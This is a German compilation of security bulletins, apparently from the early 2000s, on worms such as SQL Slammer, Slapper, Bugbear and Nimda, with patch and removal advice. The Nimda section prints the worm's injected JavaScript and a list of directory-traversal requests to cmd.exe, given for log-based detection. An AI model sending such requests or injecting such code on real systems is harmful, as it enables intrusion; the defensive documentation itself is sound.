SQL-Wurm legt teilweise Internet lahm

Ein winziger SQL-Wurm mit einer Größe von lediglich 376 Byte legt derzeit weite Teile des Internets lahm. W32.SQLExp.Worm" - ebenfalls bekannt als "SQL Slammer", "DDOS.SQLP1434.A" sowie "W32/SQLSlammer" nutzt dabei eine seit einem halben Jahr bekannte Lücke des Microsoft SQL Servers.

Alle großen Anbieter von Antivirensoftware warnen vor dem neuen Wurm, der Rechner mit Microsofts "SQL Server 2000" oder der "Microsoft Desktop Engine (MSDE) 2000" lahm legt. Der Wurm löst über ein modifiziertes UDP-Packet auf Port 1434 einen Bufferoverflow aus und beginnt dann, sich mit der vollen Bandbreite des Rechners an zufällige IP-Adressen weiterzuverschicken.

Da er in einem einzigen Datenpaket Platz findet, kann er sich mit einer bisher nie da gewesenen Geschwindigkeit verbreiten. Auch erzeugen die vielen Datenpaket ein Datenvolumen, dass bereits Teile des Internets lahm zu legen droht.

Der Wurm wird derzeit als extrem gefährlich eingestuft. Internet Security Systems  http://www.iss.net/security_center/ hat mit AlertCon 4 die höchste Bedrohungsstufe ausgerufen und geht davon aus, dass dieser Zustand noch das Wochenende über aufrecht erhalten bleibt. Code Red und Nimda hatten nur Stufe 3 erreicht.

Microsoft bietet seit dem 24. Juli letzten Jahres einen passenden Patch,  http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp der diese Lücke schließt. Wie die gegenwärtige Eskalation zeigt, scheinen aber viele Rechner ungeschützt zu sein. Auch alle Antiviren-Software-hersteller arbeiten derzeit fieberhaft an Lösungen und bieten erste Updates zum Schutz gegen SQL Slammer an. Wir empfehlen als erste Notfalllösung, sofort den UDP-Port 1434 in beide Richtungen in Ihrer Firewall zu blocken.

Einen Patch von Symantec finden sie auf unserem FTP Server hier

Wurmangriff: Bugbear und Opaserv schlagen zu

Zwei Windows32-Würmer verbreiten sich derzeit rasant im Netz: Bugbear -
alias Tanatos - und Opaserv, auch als Scrup bekannt. Beide befallen von der
infizierten Maschine aus auch Netzwerk-Shares.
Bugbear, ein klassischer Massmailer-Wurm, kommt als UPX-gepacktes
Mailattachment mit 50 KByte Länge. Wie sein Vetter Klez nutzt er die
IFRAME-Vulnerability des MS Internet Explorer 5.x, um sich beim Preview
oder Öffnen der Mail mit MS Outlook zu starten.
Der Wurm kopiert sich als .exe mit einem dreibuchstabigen,
zufallsgenerierten Namen (etwa cuu.exe oder cti.exe) in den lokalen
Startup-Folder. So wird er bei jedem Neustart wieder ausgeführt. Kann er
über Netzwerk-Shares die Startup-Verzeichnisse anderer Rechner erreichen,
nistet er sich dort ebenfalls ein.

Nach dem Start legt Bugbear drei DLLs im %system%-Directory sowie zwei
.dat-Files im %windir%-Verzeichnis an. Diese nicht selbst virulenten
Dateien tragen exotische Namen wie lgguqqa.dll oder okkqsa.dat und müssen,
da AV-Scanner sie nicht direkt erkennen können, manuell entfernt werden.
Der Wurm sucht alle Mail-Files auf dem befallenen Rechner nach Adressen ab
und versendet sich dann an diese weiter. Dazu nutzt er seinen eigenen,
integrierten SMTP-Engine und verwendet als Relay den in
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Account Manager\Accounts
eingetragenen Server.
Damit nicht genug: Findet Bugbear im Speicher einen
Antiviren-Scanner-Prozess, terminiert er diesen. Davon betroffen sind die
Produkte aller gängigen AV-Hersteller. Zudem öffnet der Wurm auf dem
Rechner auch noch eine Backdoor, die sich über den TCP-Port 36794 erreichen
lässt.

Der Opaserv-Wurm, über dessen Erstinfektionsweg bis jetzt bei keinem
AV-Hersteller Informationen verfügbar sind, verbreitet sich wie Bugbear
über freigegebene Netzwerkverzeichnisse. Er kopiert sich selbst als
scrsvr.exe auf den Remote-Rechner. Anschließend versucht er, von der Site
www.opasoft.com ein Update ("scrupd.exe") nachzuladen.
Um bei jedem Booten erneut geladen zu werden, trägt sich Opaserv in den
Schlüssel HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
der Registry ein. Dort kann er unter verschiedenen Namen auftauchen, die
jedoch alle den Namensbestandteil "scrsrv" gemeinsam haben. Zudem legt er
im Wurzelverzeichnis des Laufwerks C: die Datei tmp.ini an. Anschließend
modifiziert er die reguläre win.ini so, dass sie über tmp.ini ebenfalls zum
Start des Wurms dienen kann.
Eine von außen erfolgte Infektion mit Opaserv lässt sich entsprechend am
Vorhandensein dieser Datei erkennen. Wurde der Wurm lokal bereits
ausgeführt, finden sich zudem die Files scrsin.dat und scrsout.dat im
Wurzelverzeichnis des C:-Laufwerks.

Alle größeren Antiviren-Hersteller bieten bereits Signaturen an, mit deren
Hilfe sich Bugbear und Opaserv identifizieren und unschädlich machen
lassen. Es empfiehlt sich dringend, die entsprechenden Updates schnellstens
einzuspielen.

Slapper nutzt einen Buffer Overflow im mod_ssl-Modul von Apache-Servern, um
eine Backdoor auf dem befallenen System zu installieren. Der seit Freitag, 20.09.02,
grassierende Wurm hat bereits Tausende von Linux-Maschinen infiziert.

Dabei nutzt der Schädling erstmals eine bislang nur theoretisch bekannte
Verbreitungsmöglichkeit: Er transportiert sich als C-Quellcode und
kompiliert sich erst auf dem befallenen System mit Hilfe des lokalen
gcc-Compilers. Dadurch erzielt Slapper eine hohe "Kompatibilität" und
befällt praktisch jede Distributionsvariante.

Der Wurm stellt zunächst eine Verbindung zu Port 80 (HTTP) des Zielsystems
her und versucht über einen ungültigen GET-Request die installierte Linux-
und Apache-Version zu bestimmen. Falls dies fehlschlägt, nimmt er einen
Apache 1.3.23 auf Red Hat Linux 7 als Installationsbasis an. Anschließend
nutzt er über Port 443 ( SSL) einen Buffer Overflow Exploit in der
Handshake-Prozedur von mod_ssl, um eine Shell (/bin/sh) aufzurufen. In
dieser kompiliert er mittels des lokal installierten gcc seinen Sourcecode
(/tmp/.bugtraq.c), den er zuvor in UU-kodierter Form (/tmp/.uubugtraq)
übertragen hat.
Das Slapper-Binary (/tmp/.bugtraq) wird unter der User-ID des Webservers
(typischerweise "apache") mit der IP-Adresse der Angreifer-Maschine als
Parameter gestartet. Auf diese Weise bilden die befallenen Systeme ein
Peer-to-Peer-Netz, das sich zu DDoS-Angriffen nutzen lässt. Befehle können
dabei über eine Backdoor eingespeist werden, die auf dem TCP-Port 2002 auf
eine Verbindungsaufnahme wartet. Zu den eingebauten Fähigkeiten von Slapper
zählen Flooding-Attacken mit TCP-, TCP/IPv6- und UDP-Paketen sowie DNS
-Queries. Daneben kann der Wurm auf externe Anforderung das infizierte
System auch nach E-Mail-Adressen absuchen. Diese schickt er dann via
UPD-Port 10100 an das aufrufende System zurück.

Um eine Infektion zu vermeiden, sollte auf allen anfälligen Systemen die
Aufnahme von HTTPS-Connections unterbunden oder zumindest das anfällige
SSLv2-Protokoll ausgeschaltet werden. Gegen die derzeitig grassierende
Slapper-Variante hilft auch die Deinstallation des vom Wurm benötigten
Compilers; künftige Wurm-Versionen könnten allerdings auch als Binaries
ankommen. Auf bereits befallenen Servern gilt es den laufenden Prozess des
Wurms mit killall -9 .bugtraq aus dem Speicher zu entfernen und die
Slapper-Dateien aus dem /tmp-Verzeichnis zu löschen.
Nach Ansicht von Eugene Kaspersky, Forschungschef beim Antiviren-Hersteller
Kaspersky Labs, dürften in nächster Zeit zahlreiche Varianten und Clones
von Slapper zu erwarten sein. "Um eine eigene Modifikation zu verbreiten,
muss man nur den Quellcode verändern, der ja im Internet quasi frei
verfügbar ist. Zudem könnte Slapper der Ausgangspunkt einer neuen Welle von
Multiplattform-Schädlingen werden, die gleichermaßen Linux, Windows, Unix
und andere Betriebssysteme befallen", warnt Kaspersky. "Schließlich finden
sich auf jedem gängigen OS sowohl Sicherheitslücken als Infektionsquelle
als auch Compiler, um den Wurm lauffähig zu machen."

Bei der "Def Con" in Las Vegas haben drei südafrikanische Entwickler einen
Trojaner namens Setiri gezeigt, der sich von Firewalls nicht aufhalten
lässt. Die Proof-of-Concept-Technologie bedient sich einer Funktion im
Internet Explorer.
Der Weg von Setiri zum Benutzer unterscheidet sich den Entwicklern zufolge
nicht von der üblichen Verschickung von Würmern und Viren. Als
E-Mail-Attachment oder per Download könnte der Trojaner also auf der Platte
landen, würden die Autoren nicht versichern, ihn gar nicht erst
loszulassen.

Öffnet ein Benutzer das Attachment, mache Setiri sich mehr oder minder
unsichtbar, zumindest für Firewalls. Der Trojaner nutze eine Funktion des
Internet Explorer, die das Öffnen von unsichtbaren Instanzen des Browsers
erlaube. Für eine Firewall ist das nach Angaben der Entwickler kein Grund,
Alarm zu schlagen, da der übliche Port benutzt wird. Setiri führe zudem
keine Kommandos aus, die einer Firewall verdächtig erscheinen. Letztlich
tarne sich der Schädling einfach als Internet Explorer.

Bei der Proof-of-Concept-Demonstration auf der Def Con war der Trojaner
darauf programmiert, sich mit dem Anonymisierungsdienst Anonymizer.com zu
verbinden. Von dort holte er seine Kommandos, die vom Ausspähen der
Tastatureingaben bis zur Verschickung von Passwörtern reichen können. Über
den Anonymizer-Dienst wäre es zudem schwer möglich, die Spuren des Angriffs
zu verfolgen.
Laut Roelof Temmingh, einem der drei Entwickler, die alle als Berater bei
Sense Post tätig sind, müsste Microsoft zur sicheren Abwehr die Möglichkeit
zum Öffnen von unsichtbaren IE-Fenstern abschalten. Damit würden aber auch
Funktionen des IE verloren gehen. Ein Microsoft-Sprecher sagte gegenüber
den Entwicklern unverbindlich, man werde das demonstrierte Szenario
untersuchen.
Für das Trio aus Südafrika Haroon Meer, Roelof Temmingh und Charl van der
Walt besteht eines der Ziele der Demonstration darin, dass sich - neben
Microsoft - auch Entwickler von Firewalls Gedanken darüber machen, wie ihre
Produkte sicherer werden können. Das Augenmerk sollte insbesondere auf
Anwendungen und Prozessen liegen, die als sicher eingestuft werden. Der
einfache Trick von Setiri sei, standardmäßig als sicher eingestufte
Anwendungen zu missbrauchen.

MS: General-Patch heilt Internet Explorer

MS hat eine Art Super-Patch fuer den Internet Explorer entwickelt. Er enthaelt alle bisherigen Patches fuer den IE. Zudem schliesst er sechs neue Luecken.Microsoft hat eine Art Super-Patch für den Internet Explorer entwickelt. Er enthält alle bislang veröffentlichten Patches für den IE ab Version 5.01 bis 6. Zudem schließt er sechs neu entdeckte Lücken. Der Cumulativ-Pach ist in diversen Sprachversionen vorhanden, unter anderem auch in deutsch. Neben den alten Lücken schließt der Patch auch sechs in jüngerer Vergangenheit entdeckte. Darunter den so genannten Cross-Site-Scripting-Bug, mit dem sich lokal gespeicherte HTML-Dateien missbrauchen lassen. Auch der Verwaltung von Cookies hat sich Microsoft angenommen. Bisher sei es möglich gewesen, durch Scripts fremde Cookies auszulesen. Je nach dort gespeicherter Information können sensible Informationen des Benutzers preisgegeben werden. Weitere Fehler, die Angreifern meist Tür und Tor öffnen, betreffen unter anderem den Umgang mit HTML-Objekten für Cascading Style Sheets. Mit einer präparierten Webseite (oder per HTML-Mail) und Kenntnis über die Pfade zu den gewünschten Dateien lassen sich über die Lücke lokal gespeicherte Inhalte auslesen. Des Weiteren behandelt der Patch eine Variante des Zone-Spoofing. Einem Angreifer kann es dabei gelingen, durch eine präparierte Webseite die voreingestellte Sicherheitsstufe des IE zu verlassen. Letztlich kann der Angreifer damit als vertauenswürdiger Intranet-Benutzer agieren. Zwei weitere Lücken betreffen das Content Disposition-Phänomen. Dabei wird dem Internet Explorer über die Datei-Endung vorgegaukelt, eine Datei sei harmlos und könne automatisch abgehandelt werden. In Wirklichkeit versteckt sich aber ausführbarer Code in der Datei. Mit dem Patch verändert Microsoft auch die Einstellungen der Zone "Eingeschränkte Sites". Programme, die auf diese Zone zugreifen, darunter Outlook, können nach der Änderung standardmäßig keine Frames mehr in dieser Zone verwenden. Es sei einem Angreifer damit unmöglich, über eine HTML-E-Mail ein Programmfenster zu öffnen oder einen Download anzustoßen, glaubt Microsoft. Zwei weitere Lücken betreffen das Content Disposition-Phänomen. Dabei wird dem Internet Explorer über die Datei-Endung vorgegaukelt, eine Datei sei harmlos und könne automatisch abgehandelt werden. In Wirklichkeit versteckt sich aber ausführbarer Code in der Datei. Mit dem Patch verändert Microsoft auch die Einstellungen der Zone "Eingeschränkte Sites". Programme, die auf diese Zone zugreifen, darunter Outlook, können nach der Änderung standardmäßig keine Frames mehr in dieser Zone verwenden. Es sei einem Angreifer damit unmöglich, über eine HTML-E-Mail ein Programmfenster zu öffnen oder einen Download anzustoßen, glaubt Microsoft. Das zugehörige Bulletin MS02-023 mit Links zu den verschiedenen Patches finden Sie hier oder auf unserem FTP Server. -------------------------------------------------------------------------------------------------

Neue Wurm-Variante: W32.Klez.H@mm

Erneut ist ein modifizierter Klez-Abkömmling im Netz unterwegs: Bei W32.Klez.H@mm 

handelt es sich um eine Spielart des Mail-Wurms Klez.E. Er installiert sich im Windows-Systemverzeichnis und erzeugt einen Autostart-Eintrag in der Registry. Zudem 

infiziert der Wurm Dateien auf lokalen bzw. Netzwerk-Verzeichnissen und injiziert einen Virus (W32.Elkern.4926 ) ins System. Zur Weiterverbreitung via E-Mail nutzt Klez.H neben dem Windows-Adressbuch auch die ICQ-Datenbank.

-------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------

Der Wurm selbst verspricht in der zugehörigen Mail eine lustige Karikatur des ehemaligen US-Präsidenten Bill Clinton ("look to bill caricature it's vvvery verrrry ffffunny"). Nach dem Ausführen des Anhangs "cari.scr" wird auch eine Karikatur angezeigt. Unterdessen kopiert sich der Wurm ins Windows-Systemverzeichnis und trägt sich in die Registry ein.

Die Schadensroutine des Wurms versucht, nach dem Neustart des Systems alle Dateien (*.*) aus den Laufwerken C: bis F: zu löschen. Symantec und anderen Antivirenherstellern war es in der ersten Prüfung in Laborumgebung nicht gelungen, diesen Löschvorgang zu reproduzieren. Nun hat sich die Lage verändert. Den neuen Erkenntnissen zufolge liest der Schädling die Systemzeit aus und schlägt zwischen acht und neun Uhr morgens zu, einer Zeit also, in der viele PCs gestartet werden. Dann allerdings funktioniert die Schadensroutine wie geplant und löscht Dateien.

Nach Informationen von mehreren Herstellern von Antivirensoftware treibt mit 
"W32.Myparty@mm" ein neuer Mail-Wurm sein Unwesen. Zu erkennen ist der Schädling 
an der Betreffzeile "new photos from my party" und einem Attachment 
"www.myparty.yahoo.com" - dahinter verbirgt sich allerdings keine URL, sondern ein 
ausführbares .COM-Programm. Dieses verfügt über einen integrierten SMTP-Teil, der den Weiterversand an alle Einträge im Windows-Adressbuch übernimmt.Der Wurm  liest dazu den Default-Server für den Mailversand sowie den Speicherort des Adressbuchs aus der Registrierdatenbank aus und erzeugt im Papierkorb (C:\Recycled) das Programm Regctrl.exe, 
das er anschließend ausführt.
------------------------------------------------------------------------------------------------

W32.GonerA@mm befällt tausende PCs           
Ein in Visual Basic programmierter Massenmailer-Wurm namens Goner geht derzeit um. In der Betreffzeile des Schädlings steht "Hi". Die Nachrichtentexte variieren zwischen: "How are you ?", "When I saw this screen saver, I immediately thougt about you" und "I am in a harry, I promise you will love it!". Nach Aktivierung der angehängten Datei "gone.scr" erscheint eine animierte Dialogbox mit dem Titel About. In dieser Zeit verschickt sich der als Bildschirmschoner getarnte Wurm über Outlook sowie ICQ- und IRC-Netzwerke. Der angerichtete Schaden fällt nicht zu knapp aus. Verschiedene exe-Prozesse (darunter  Firewall  und  Antivirenprogramme) sowie das Verzeichnis c:\safeweb werden gelöscht. Sollte dies nicht gelingen, werden die  Dateinamen in die wininit.ini hinterlegt und beim nächsten Systemstart entfernt.Verschiedene Antivirenspezialisten bieten auf ihren Websites kostenlose Entfernungstools. Symantec, NAI, Trendmicro, Norman, Kaspersky, Sophos

---------------------------------------------------------------------------------------------                                 
Der BadTrans.B-Wurm verbreitet sich seit Montag lawinenartig im Internet. Durch ein Sicherheitsloch kann sich der Mail-Anhang automatisch beim Betrachten der E-Mail mit Outlook oder Outlook-Express ausfuehren. Verdaechtig sind alle Mails mit Anhang und einer Dateigrosse von ca. 40 kb sowie dem Betreff *Re*.
Das Tool verlangt keinerlei Installation, sondern kann direkt nach dem Download gestartet werden. Tipp: Laden und archivieren Sie dieses Tool auf jeden Fall, damit Sie es auf Ihrem Rechner bei Bedarf zur Verfuegung haben:

--------------------------------------------------------------------------------------------
Für den rein privaten Gebrauch finden Sie kostenlos hier den Virenscanner F-Prot  
von der Firma Frisk. F-PROT wird von der isländischen Firma FRISK SOFTWARE INTERNATIONAL herausgegeben. Die Firma FRICK erlaubt die freie Verbreitung 
von F-PROT alleine für den privaten Bereich. Firmenkunden müssen Lizenzen 
erwerben. (z.Zt. 1US$ pro PC und mind. 20 Lizenzen müssen abgenommen werden).
Download: http://www.frisk.is/f-prot/
Die Anschrift lautet:
Postholf 7180
127 Reykjavik
ICELAND
Tel: +354-561-7273
Fax: +354-561-7274
Fragen können an sales@comlex.is gesendet werden.

-------------------------------------------------------------------------------------------

Arbeitsweise des Wurms

von Client zu Client per EMail

 

von Client zu Client über freigegebene Verzeichnisse

Der Wurm tritt auf in Form einer MIME "multipart/alternative" Nachricht, bestehend aus zwei Teilen. Der erste Teil ist vom MIME-Typ "text/html", enthält jedoch keinen weiteren Text, so daß die Mail als leer erscheint. Der zweite Teil ist zwar vom MIME-Typ "audio/x-wav", enthält aber eine ausführbare Datei namens "readme.exe", die Base64-kodiert ist.

Durch eine bekannte Schwachstelle in Microsofts Internet Explorer, die eingebettete MIME-Types automatisch ausführt, infiziert diese EMail Windows-Systeme, auf denen ein ungepatchter IE zum Anzeigen von HTML-Mails verwendet wird (unabhängig vom verwendeten Mailprogramm) durch einfaches Öffnen dieser Mail.

Die Schwachstelle "Automatic Execution of Embedded MIME Types" wurde beschrieben im Microsoft Security Bulletin MS01-020. Patches finden Sie auch auf folgendem FTP-Server[1].

Den EMails, die zur Verbreitung des Nimda-Wurms dienen, haben folgende Charakteristik:

 

der Text in der "Subject:" ("Betreff:") Zeile variiert, ist jedoch in allen bisher bekannt gewordenen Fällen mehr als 80 Zeichen lang.

die angehängte ausführbare Datei ist nicht immer dieselbe und es ergeben sich verschiedene MD5 Prüfsummen. Die Länge beträgt in allen bekannten Fällen konsistent 57344 Byte.

Nach der Infektion versucht der Wurm nach bekanntem Muster, sich selbst an alle Adressen zu versenden, die als Absender in der Inbox des Nutzers gefunden oder in .htm oder .html Dateien im Verzeichnis Temporary Internet Files gefunden wurden, verwendet.

Darüberhinaus versucht Nimda, sich auf alle verfüg- und beschreibbaren freigegebenen Verzeichnisse im Windows-Netzwerk zu kopieren. Im Erfolgsfall muß jedoch für eine Infizierung des Zielsystems der Wurm dort von Hand gestartet werden.

Unter anderem kopiert sich der Wurm als "riched20.dll" in jedes Verzeichnis (lokal oder Netzwerk), welches eine .doc oder .eml Datei enthät. MS Word, MS Wordpad oder MS Outlook werden beim Öffnen dieser Dateien die falsche riched20.dll ausführen.

Durch Änderungen in der Registry richtet der Wurm auf infizierten Systemen versteckte Shares für alle lokalen Partitionen ein. Dazu legt er für jeden Laufwerksbuchstaben einen Key

 

    HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ -> Z$]

an.

 

Verbreitung Client to Webserver

Außerdem beginnt Nimda damit, durch verschiedene Schwachstellen verwundbare Internet Information Server im Netz zu suchen. Dazu scannt das Programm verschiedene IP-Adreßbereiche, die es nach dem folgenden Prinzip auswählt:

 

in 50% der Fälle wird eine Adresse gewählt, die in den ersten beiden Octets mit der Adresse des eigenen Systems übereinstimmt

in 25% der Fälle stimmt die gewählte Adresse im ersten Octet überein

in 25% der Fälle wählt Nimda eine zufällige IP-Adresse aus

Der Wurm sucht nach folgenden Schwachstellen:

 

Backdoors verursacht durch CodeRed2-Befall, beschrieben in der Incident-Meldung IN-2001-09 vom Cert/CC

Backdoors verursacht durch Befall durch den "sadmind/IIS" Wurm, beschrieben im CERT-Advisory CA-2001-11, welches wir am 08. Mai 2001 über win-sec-ssc verschickt haben.

direktes Ausnutzen der Schwachstelle "IIS Directory Traversal vulnerability", beschrieben in der Vulnerability-Meldung VU#11167 vom Cert/CC

Für die behebung aller 3 genannter IIS-Schwachstellen existiert ein Sammelpatch von Microsoft, den Sie auch auf folgendem FTP-Server finden. [2]

Im Erfolgsfall infiziert Nimda den gefundenen IIS, transferiert via TFTP eine Kopie von sich selbst auf den Server und startet sie. Auf dem neu infizierten System durchläuft Nimda rekursiv alle lokalen oder per Windows-Netzwerk verbundenen Verzeichnisse und legt wiederum eine Kopie von sich unter dem namen "readme.eml" ab.

Enthält eines dieser Verzeichnisse Web-Inhalte (HTML- und ASP-Dateien), so wird jeder dieser Dateien folgender Javascript-Code hinzugefügt, der der Weiterverbreitung per WWW dienen soll:

 

<script language="JavaScript">
    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>

 

von Webserver zu Client durch Browsen kompromitierter Webseiten

Ruft ein Benutzer mit einem Javascript-fähigen Browser eine der in oben genannter Weise modifizierten Webseiten auf, so wird eine Kopie der Datei readme.eml auf das Client-System heruntergeladen. Je nach Browserart und Konfiguration startet der Browser die Datei und infiziert dadurch den Client.

Einen Scan durch den Nimda-Wurm hinterläßt im Logfile eines beliebigen Webservers, der seine Dienste auf Port 80/tcp anbietet, folgenden Footprint:

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..\xc1\x1c..
/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Einen potentiellen Befall durch Nimda können Betreiber eines Internet Information Servers durch folgende Überprüfung feststellen:

Existiert die Datei "root.exe" im System, so ist es bereits früher Opfer des CodeRed2 oder sadmind/IIS Wurms geworden und potentiell anfällig für Nimda.

Existiert die Datei "admin.dll" im Root-Verzeichnis der von Windows ansprechbaren Partitionen (C:, D:, etc.) oder im Webfolder des IIS, so deutet dies auf eine Kompromitierung durch Nimda hin. Die Originaldatei (gehört zu den MS Frontpage Server Extensions) ist ca. 21 KB groß. Eine kompromittierte "admin.dll" ist immer genau 57344 Bytes groß und eine 1:1 Kopie der "readme.exe" des Wurms.

Existieren Dateien mit der Endung ".eml" im System, die genau 57344 Bytes groß sind, so sind diese vermutlich ebenfalls 1:1 Kopien der "readme.exe" des Wurms.

Existiert die Datei "riched.dll" im Systemverzeichnis mit einer Länge von genau 57344 Bytes, so ist auch dies eine 1:1 Kopie der "readme.exe" und ihr System kompromittiert.

Der einzige sichere Weg, den Wurm zu beseitigen, ist die Neuinstallation des Systems von einer sauberen CD. Hinweise zum korrekten vorgehen finden Sie in den Tech-Tips des Cert/CC unter

http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Im Anschluß, bevor das System wieder ans Netz geht, muß dringend der oben bereits angesprochene Patch für den IIS (beschrieben in MS01-044) eingespielt werden, den Sie auch auf dem FTP-Server finden. [2]

 

Gemeinsame Effekte:

Nimda erzeugt einen Guest Account oder aktiviert den vorhandenen Guest Account und fügt ihn der Gruppe der Administratoren hinzu.

Jedermann wird voller Zugriff (Lesen und Schreiben) auf die C: Share gewährt.

Nimda durchsucht rekursiv lokalen Verzeichnisse und infiziert alle .exe und .dll Dateien, indem es sie durch eine Kopie seiner Selbst ersetzt und die Originaldatei sich selbst als Resource hinzufügt.

Der Wurm durchsucht alle lokalen Verzeichnisse nach .htm, .html oder .asp Dateien und fügt den oben beschriebenen Javascript Code am Anfang der Dateien ein. Jeder, der sich diese Dateien mit einem Browser ansieht, in dem Javascript aktiviert ist, infiziert sich wiederum mit dem Wurm.

Alle Subschlüssel im Registry Baum SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security werden gelöscht, um evtl. ergriffene Sicherheitsmaßnahmen auf Share Ebene ausser Kraft zu setzen.

Der Wurm verändert die Datei SYSTEM.INI dergestalt, daß er bei einem Systemstart automatisch mitgestartet wird. Dies wird erreicht durch den Eintrag

 

    [boot]
     shell=explorer.exe load.exe=dontrunold

Weiter verändert der Wurm die Einstellungen des Explorers so, das versteckte (Hidden) Dateien nicht mehr angezeigt werden. Dazu werden die folgenden Registry Einträge modifiziert:

 

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\HideFileExt
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Hidden
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\ShowSuperHidden

Varianten des Wurms

Derzeit sind noch keine Wurm-Varianten bekannt oder gemeldet.

 

Gegenmaßnahmen

 

Endbenutzer

Benutzern von Endsystemen wird geraten:

 

• den Patch für den Internet Explorer einzuspielen, der die im Security Bulletin MS01-020 beschriebene Schwachstelle beschriebene Schwachstelle beseitigt. Diesen Patch finden Sie auch auf dem FTP-Server. [1]
• die Antivirensoftware auf den neuesten Stand zu bringen.
• keine EMail-Attachments zu öffnen
• Java-Script im Webbrowser zu deaktivieren

 

Systemadministratoren

Es wird empfohlen, sowohl die Schwachstellen im Internet Explorer als auch im Internet Information Server zu schließen. Dazu existieren folgende Patches von Microsoft:

 

Automatisches Ausführen von MIME-Daten im Internet Explorer

Voraussetzung: IE 5.01 SP1 (!) oder IE 5.5 SP1 (!). Der Patch ist in IE 5.01 SP2 bereits enthalten. IE 5.5 SP2 und IE 6.0 sind ebenfalls nicht von der Schwachstelle betroffen.

Bitte beachten Sie, das vor Einspielen des Patches der Internet Explorer auf den Versionstand 5.0SP1 oder 5.5SP1 gebracht werden muß. Anderenfalls erhalten sie eine falsche Nachricht, das ihre Version von der Schwachstelle nicht betroffen ist.

Die folgenden URLs beziehen sich auf den Spiegel der Patches beim DFN-CERT. Das Orginaladvisory von Microsoft mit den Verweisen auf die Patch-Links finden sie unter MS-01-020. Die dort angegebenen Patches sind jedoch nicht mehr aktuell. Stattdessen sollten sie die Patches aus MS-01-027 verwenden.

 

IE 5.01 SP1 englisch:

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/iexplorer/Security_Bulletins/q295106_en.exe

IE 5.5 SP1 englisch:

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/iexplorer/Security_Bulletins/q299618_en.exe

 

IE 5.01 SP1 deutsch:

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/iexplorer/Security_Bulletins/q295106_de.exe

 

IE 5.5 SP1 deutsch:

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/iexplorer/Security_Bulletins/q299618_de.exe

 

Sammelpatch zur Behebung bekannter IIS-Schwachstellen

Die folgenden URLs beziehen sich auf den Spiegel der Patches beim DFN-CERT. Das Orginaladvisory von Microsoft mit den Verweisen auf die Patch-Links finden sie unter MS01-044

 

IIS 5.0 (englisch):

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/win2000/Security_Bulletins/
Q301625_W2K_SP3_x86_en.EXE

 

IIS 5.0 (deutsch):

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/win2000/Security_Bulletins/
q301625_w2k_sp3_x86_de.exe

 

IIS 4.0 (NT Server)(englisch)

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/winnt2/Security_Bulletins/Q301625i.exe

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/winnt2/Security_Bulletins/Q301625is.exe

 

IIS 4.0 (NT Server)(deutsch)

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/winnt2/Security_Bulletins/Q301625i_de.exe

ftp://ftp.cert.dfn.de/pub/vendor/microsoft/winnt2/Security_Bulletins/Q301625is_de.exe

----------------------------------------------------------------------------------------------

11.07.2000 15:30:39